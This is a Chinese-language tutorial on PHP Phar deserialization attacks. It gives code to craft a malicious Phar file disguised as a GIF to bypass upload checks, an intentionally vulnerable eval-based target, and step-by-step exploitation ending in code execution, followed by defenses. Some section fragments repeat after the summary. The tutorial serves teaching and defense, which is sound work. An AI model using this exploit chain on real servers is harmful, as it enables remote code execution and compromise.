Phar协议反序列化漏洞深入分析与利用<\/h1>

1. 漏洞概述<\/h2>
Phar反序列化漏洞是由Secarma的安全研究员Sam Thomas在BlackHat会议上公开的一种新型PHP对象注入攻击方式。该漏洞可以在不使用`unserialize()<\/code>函数的前提下，通过PHP的流包装器(Stream Wrapper)机制实现反序列化操作，可能导致远程代码执行(RCE)。<\/p>`

2. 流包装器(Stream Wrapper)基础<\/h2>
PHP支持多种URL协议访问文件路径，常见的有：<\/p>

data:\/\/<\/code><\/li>
zlib:\/\/<\/code><\/li>
php:\/\/<\/code><\/li>
phar:\/\/<\/code> (本漏洞核心)<\/li>
<\/ul>
示例用法：<\/p>
include<\/span>('php:\/\/filter\/read=convert.base64-encode\/resource=index.php'<\/span>);
<\/span><\/span>include<\/span>('data:\/\/text\/plain;base64,xxxxxxxxxxxx'<\/span>);
<\/span><\/span><\/code><\/pre>3. Phar文件结构解析<\/h2>
Phar文件本质上是一种压缩文件，包含以下关键部分：<\/p>

Stub<\/strong>：文件标识，格式为xxx<?php xxx;__HALT_COMPILER();?><\/code>，必须以__HALT_COMPILER();?><\/code>结尾<\/li>
Manifest<\/strong>：存储被压缩文件的权限、属性等信息<\/li>
文件内容<\/strong>：实际压缩的文件数据<\/li>
签名<\/strong>：文件签名（可选）<\/li>
<\/ol>
4. 漏洞核心原理<\/h2>
Phar文件的manifest部分会以序列化的形式存储用户自定义的meta-data。当使用phar:\/\/<\/code>协议访问Phar文件时，PHP会自动反序列化这些meta-data，从而触发反序列化漏洞。<\/p>
5. 创建Phar文件示例<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> TestObject<\/span> {
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>("phar.phar"<\/span>); \/\/ 后缀名必须为phar
<\/span><\/span><\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>("<?php __HALT_COMPILER(); ?>"<\/span>); \/\/ 设置stub
<\/span><\/span><\/span><\/span>
<\/span><\/span>$o =<\/span> new<\/span> TestObject<\/span>();
<\/span><\/span>$o-><\/span>data<\/span> =<\/span> 'hu3sky'<\/span>;
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($o); \/\/ 将自定义的meta-data存入manifest
<\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>("test.txt"<\/span>, "test"<\/span>); \/\/ 添加要压缩的文件
<\/span><\/span><\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>注意<\/strong>：需要将php.ini中的phar.readonly<\/code>选项设置为Off才能生成Phar文件。<\/p>
6. 受影响的文件系统函数<\/h2>
以下函数在通过phar:\/\/<\/code>协议解析Phar文件时都会反序列化meta-data：<\/p>

file_exists()<\/li>
fopen()<\/li>
file_get_contents()<\/li>
file()<\/li>
is_dir()<\/li>
is_executable()<\/li>
is_file()<\/li>
is_link()<\/li>
is_readable()<\/li>
is_writable()<\/li>
is_writeable()<\/li>
parse_ini_file()<\/li>
copy()<\/li>
unlink()<\/li>
stat()<\/li>
readfile()<\/li>
<\/ul>
7. 漏洞触发示例<\/h2>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> TestObject<\/span> {
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        echo<\/span> $this-><\/span>data<\/span>; \/\/ 反序列化时触发
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>include<\/span>('phar:\/\/phar.phar'<\/span>); \/\/ 触发反序列化
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>8. 绕过上传限制的技巧<\/h2>
由于PHP仅通过__HALT_COMPILER();?><\/code>识别Phar文件，可以：<\/p>

添加任意文件头（如GIF89a）<\/li>
修改文件后缀名<\/li>
<\/ol>
示例：<\/p>
$phar-><\/span>setStub<\/span>('GIF89a'<\/span>.<\/span>'<?php __HALT_COMPILER(); ?>'<\/span>); \/\/ 添加GIF文件头
<\/span><\/span><\/span><\/code><\/pre>这样生成的Phar文件可以伪装成GIF等格式绕过上传检测。<\/p>
9. 完整漏洞利用流程<\/h2>
环境准备<\/h3>

上传页面<\/strong> (upload_file.php)：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>if<\/span> (($_FILES["file"<\/span>]["type"<\/span>]==<\/span>"image\/gif"<\/span>) &&<\/span> 
<\/span><\/span>    (substr<\/span>($_FILES["file"<\/span>]["name"<\/span>], strrpos<\/span>($_FILES["file"<\/span>]["name"<\/span>], '.'<\/span>) +<\/span> 1<\/span>) ==<\/span> 'gif'<\/span>)) {
<\/span><\/span>    \/\/ 上传处理逻辑
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    echo<\/span> "Invalid file, you can only upload gif"<\/span>;
<\/span><\/span>}
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
存在漏洞的文件<\/strong> (file_un.php)：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>$filename =<\/span> $_GET['filename'<\/span>];
<\/span><\/span>
<\/span><\/span>class<\/span> AnyClass<\/span> {
<\/span><\/span>    var<\/span> $output =<\/span> 'echo "ok";'<\/span>;
<\/span><\/span>    function<\/span> __destruct() {
<\/span><\/span>        eval<\/span>($this-><\/span>output<\/span>); \/\/ 危险的反序列化点
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>file_exists<\/span>($filename); \/\/ 触发点
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用步骤<\/h3>

生成恶意Phar文件：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> AnyClass<\/span> {
<\/span><\/span>    var<\/span> $output =<\/span> 'phpinfo();'<\/span>; \/\/ 要执行的代码
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>('phar.phar'<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>('GIF89a'<\/span>.<\/span>'<?php __HALT_COMPILER(); ?>'<\/span>);
<\/span><\/span>$phar-><\/span>addFromString<\/span>('test.txt'<\/span>, 'test'<\/span>);
<\/span><\/span>$object =<\/span> new<\/span> AnyClass<\/span>();
<\/span><\/span>$phar-><\/span>setMetadata<\/span>($object);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
将生成的phar.phar重命名为phar.gif<\/li>
通过上传表单上传phar.gif<\/li>
访问漏洞点：file_un.php?filename=phar:\/\/upload_file\/phar.gif<\/code><\/li>
<\/ol>
10. 漏洞利用条件<\/h2>

Phar文件能够上传到服务器<\/li>
存在可用的文件操作系统函数（如file_exists()等）<\/li>
有可用的魔术方法作为"跳板"（如__destruct()）<\/li>
文件操作函数的参数可控，且:<\/code>、\/<\/code>、phar<\/code>等特殊字符未被过滤<\/li>
<\/ol>
11. 防御措施<\/h2>

在php.ini中设置phar.readonly=On<\/code>（默认值）<\/li>
禁用不必要的流包装器：allow_url_include=Off<\/code><\/li>
严格检查上传文件内容而不仅是文件头和后缀<\/li>
对用户控制的文件路径参数进行严格过滤<\/li>
避免在魔术方法中执行危险操作<\/li>
<\/ol>
12. 总结<\/h2>
Phar反序列化漏洞扩展了PHP反序列化攻击面，使得即使没有直接的unserialize()<\/code>调用，也可能通过文件操作函数实现对象注入。这种攻击方式隐蔽性强，能够绕过常规的上传检测，危害性高。开发人员应充分了解其原理并采取适当的防御措施。<\/p>

Phar协议反序列化漏洞深入分析与利用<\/h1>

4. 漏洞核心原理<\/h2> Phar文件的manifest部分会以序列化的形式存储用户自定义的meta-data。当使用phar:\/\/<\/code>协议访问Phar文件时，PHP会自动反序列化这些meta-data，从而触发反序列化漏洞。<\/p>

9. 完整漏洞利用流程<\/h2>

4. 漏洞核心原理<\/h2>
Phar文件的manifest部分会以序列化的形式存储用户自定义的meta-data。当使用`phar:\/\/<\/code>协议访问Phar文件时，PHP会自动反序列化这些meta-data，从而触发反序列化漏洞。<\/p>`